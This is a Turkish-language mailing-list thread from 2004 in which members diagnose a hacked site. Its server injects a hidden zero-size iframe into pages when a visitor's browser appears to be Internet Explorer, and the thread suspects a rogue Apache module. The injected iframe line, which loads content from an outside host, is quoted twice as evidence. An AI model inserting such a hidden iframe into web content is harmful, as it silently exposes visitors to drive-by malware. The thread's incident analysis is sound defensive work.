From: Ali AYEN (a2@aliayen.com)
Date: Sat 16 Oct 2004 - 00:17:01 EEST
Merhaba,
Ben Windows XP üzerinde IE 6 yım ancak bende bir iframe kodu görünmüyor.
Düşük IE sürümlerini avlamaya çalışan bir kod da olabilir. Şu ana kadar
denildiği gibi bir modül olsa gerek.
İyi çalışmalar.
Ali AYEN
-----Original Message-----
From: linux-guvenlik-bounces@liste.linux.org.tr
[mailto:linux-guvenlik-bounces@liste.linux.org.tr] On Behalf Of Nilgün Belma
Bugüner
Sent: Saturday, October 16, 2004 12:08 AM
To: linux-guvenlik@liste.linux.org.tr
Subject: Re: Windos'a yine virüs bulaşmış (Eskikonu : RE: [Linux-guvenlik]
redhat 9'a virus bulasmis.)
Selam,
Gerçekten çok ilginç. Sayfayı konqueror ile konqueror olarak açtım,
anormal bir şey yoktu. Kaynağı göster dedim, herşey normal geldi.
Konquror'a "win98 üzerinde IE" ol dedim, beni hemen bir sayfaya yönlendirdi.
Sayfa kaynağını göster dediğimde sonuç:
<html>
<head>
<title>
cozumteknik.com
</title>
<iframe src="http://www.splitinfinity.info/fa/?d=get" width=0
height=0></iframe> <style>
* { font-family: verdana; font-size: 10pt; COLOR: gray; }
.............
<kesildi>
<style> satırının başına iframe'li bir kod eklenmişti.
Bu tamamen httpd ile ilgili olmalı. IE'yi görünce (sahte bile olsa) sayfaya
bu kodu ekliyor.
Bence modül olarak eklenmiştir. Modüllerini bir gözden geçirin, tarihlerine
baksanız yeter
herhalde...
Esen kalın,
Nilgün
Cuma 15 Ekim 2004 11:48 sularında, enginaar© şunları yazmıştı:
> Evet iframe'i browser'dan kaynagi actigimda gorebiliyorum ama dosyayi
> ftp'den indirip actigimda icinde ole bisey goremiyorum.
>
>
>
> Virtual Host yapilandirma dosyam asagida. Ayrıca index.html'in icerigini
de
> onun altina ekliyorum. O satiri nasil ekliyor oraya yahu.
>
>
>
> Virtual Host Tanımlama Dosyası icerigi
>
> <VirtualHost 213.243.49.6:80>
>
>
>
>
>
> ServerName www.cozumteknik.com
>
> ServerAlias www.cozumteknik.com cozumteknik.com
>
> ServerAdmin webmaster@cozumteknik.com
>
> DocumentRoot /home/cozumtek/domains/cozumteknik.com/public_html
>
> ScriptAlias /cgi-bin/
> /home/cozumtek/domains/cozumteknik.com/public_html/cgi-bin/
>
>
>
> User cozumtek
>
> Group cozumtek
>
> CustomLog /var/log/httpd/domains/cozumteknik.com.bytes bytes
>
> CustomLog /var/log/httpd/domains/cozumteknik.com.log combined
>
> ErrorLog /var/log/httpd/domains/cozumteknik.com.error.log
>
>
>
> <Directory /home/cozumtek/domains/cozumteknik.com/public_html>
>
> Options +Includes -Indexes
>
> php_admin_flag engine ON
>
> php_admin_flag safe_mode OFF
>
> </Directory>
>
>
>
>
>
>
>
> #php_admin_value open_basedir
> /home/cozumtek/:/tmp/:/var/www/:/usr/local/lib/php/:/etc/virtual/
>
>
>
> </VirtualHost>
>
>
>
>
>
> index.html dosyası icerigi
>
> <html>
>
> <head>
>
> <title>
>
> cozumteknik.com
>
> </title>
>
>
>
> <style>
>
> * { font-family: verdana; font-size: 10pt; COLOR: gray; }
>
> b { font-weight: bold; }
>
> table { height: 50%; border: 1px solid gray;}
>
> td { text-align: center; padding: 25;}
>
>
>
> </style>
>
> </head>
>
> <body>
>
> <center>
>
> <br><br><br><br>
>
> <table>
>
> <tr><td>Welcome to the home of <b>cozumteknik.com</b></td></tr>
>
> <tr><td>To change this page, upload your website into the
> public_html directory</td></tr>
>
> <tr><td><img src="logo.jpg"></td></tr>
>
> <tr><td style="font-size: 8pt">Date Created: Wed Oct 13 12:23:39
> 2004</td></tr>
>
> </table>
>
> <br><br>
>
>
>
> </center>
>
> </body>
>
>
>
> </html>
>
>
>
> -----Original Message-----
> From: linux-guvenlik-bounces@liste.linux.org.tr
> [mailto:linux-guvenlik-bounces@liste.linux.org.tr] On Behalf Of Cem Kamil
> Kulekci
> Sent: Friday, October 15, 2004 11:13 AM
> To: linux-guvenlik@liste.linux.org.tr
> Subject: Re: Windos'a yine virüs bulaşmış (Eski konu : RE:
[Linux-guvenlik]
> redhat 9'a virus bulasmis.)
>
> Devrim GUNDUZ wrote:
> > On Fri, 15 Oct 2004, enginaar© wrote:
> >> Evet Saroz-life.com'a bende baktim bi problem cikmadi da
> >>
> >> www.cozumteknik.com
> >>
> >> veya www.netdizayn.net adreslerine bi bakabilirsin. Bi de sayfaya
> >>
> >> girdiginde
> >>
> >> altta status barda yazan adreslere dikkat edebilirsin. Bana da bu olay
> >>
> >> sikayet olarak geldi. Sizin server'daki domainlere girdigimde norton
> >>
> >> virus
> >>
> >> var diyor dediler. Sizin bilgisayarda vardir bisey dedim. Ben de
> >>
> >> sistemimin
> >>
> >> temiz olduguna eminim. Bi kac siteye girdim, problem cikmadi ama
> >>
> >> cozumteknik.com a girdim, hemen exploit mexploit biseyler dedi.
>
> Evet olay ie ile alakalı ama sanırım onun dışında bişeyler var. örneğin
>
> kodlara bakarsanız
>
>
>
> <title>
>
> cozumteknik.com
>
> </title>
>
>
>
> <iframe src="http://www.splitinfinity.info/fa/?d=get" width=0
> height=0></iframe> <style>
>
> * { font-family: verdana; font-size: 10pt; COLOR: gray; }
>
> b { font-weight: bold; }
>
>
>
>
>
>
>
> bölümünü görebilirsiniz. bu frame'i hemen kodlarınızdan kaldırın.
>
> (kodlara ie ile bakmayın bazen bu tip kodları atlayabiliyor mozilla
>
> kullanabilirsiniz.) netdizayn.net ile ilgili herhangi bir sorun
görünmüyor.
>
>
>
> Kolay gelsin
>
>
>
> Cem.
>
>
>
> _______________________________________________
>
> Linux-guvenlik mailing list
>
> Linux-guvenlik@liste.linux.org.tr
>
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik